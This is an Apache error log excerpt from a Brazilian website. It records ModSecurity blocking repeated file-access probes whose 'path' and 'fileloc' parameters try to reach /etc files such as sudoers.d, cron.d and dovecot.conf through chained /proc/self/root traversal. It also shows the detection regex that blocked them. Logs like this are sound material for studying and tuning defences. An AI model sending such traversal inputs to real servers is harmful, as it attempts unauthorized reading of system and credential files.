"bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lqrninkcc-iUj5AqTlQAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:16.136349 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.27:50170] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lsPXLqtnMIWvjpaLVGwAAApY"]
[Fri Mar 20 12:20:17.072279 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.241.31:37926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lsQF0L0L-SsrnPo6gJQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:19.695002 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:34506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lsxCii7xarUs8iHai5gAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:25.457377 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:34518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lt_qxLDW4GITHUkQjPAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:27.050931 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:34528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1luwF0L0L-SsrnPo6gLAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:20:27.075841 2026] [:error] [pid 11642:tid 140411691570944] [client 57.141.18.22:50936] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1lu7ninkcc-iUj5AqTogAAA4Y"]
[Fri Mar 20 12:20:39.797800 2026] [mime_magic:error] [pid 7893:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:51558] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:20:41.333609 2026] [mime_magic:error] [pid 10189:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:47624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run
[Fri Mar 20 12:20:42.259049 2026] [:error] [pid 9818:tid 140411641214720] [client 57.141.18.88:51726] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lyl1pVZ5mVmJwsFNmmgAAAEw"]
[Fri Mar 20 12:20:46.519543 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:35512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1lzvXLqtnMIWvjpaLVRwAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:20:48.428238 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.13:51978] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lz-oXxyEfFpUF8f-4BQAAAUE"]
[Fri Mar 20 12:21:03.465016 2026] [mime_magic:error] [pid 11167:tid 140411733534464] (70014)End of file found: [client 57.141.18.111:52608] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:21:07.038013 2026] [mime_magic:error] [pid 11642:tid 140411691570944] (70014)End of file found: [client 57.141.18.86:52804] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:21:10.606714 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.244.43:41692] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1l5vqxLDW4GITHUkQjXgAAAQk"]
[Fri Mar 20 12:21:14.179429 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:41554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1l6jJ3M9BSuKP7CAZiEgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:21:25.539074 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:51612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1l9TJ3M9BSuKP7CAZiJQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:29.003323 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:40254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1l-RCii7xarUs8iHajNQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:31.703052 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.118:53632] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1l-11pVZ5mVmJwsFNmvwAAAFQ"]
[Fri Mar 20 12:21:36.318710 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:34008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mAPqxLDW4GITHUkQjgwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:38.516163 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:42628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mAQF0L0L-SsrnPo6gVgAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:39.855838 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:42638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mA_HIg5MgXLBnicMs5QAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:41.186339 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:42648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mBTJ3M9BSuKP7CAZiKAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:42.481253 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:42658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mBjJ3M9BSuKP7CAZiKgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:21:46.184744 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:54282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mCvqxLDW4GITHUkQjjAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:21:56.186896 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.13:54706] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mFDJ3M9BSuKP7CAZiQQAAAJA"]
[Fri Mar 20 12:21:58.271541 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:42672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mFl1pVZ5mVmJwsFNm4wAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
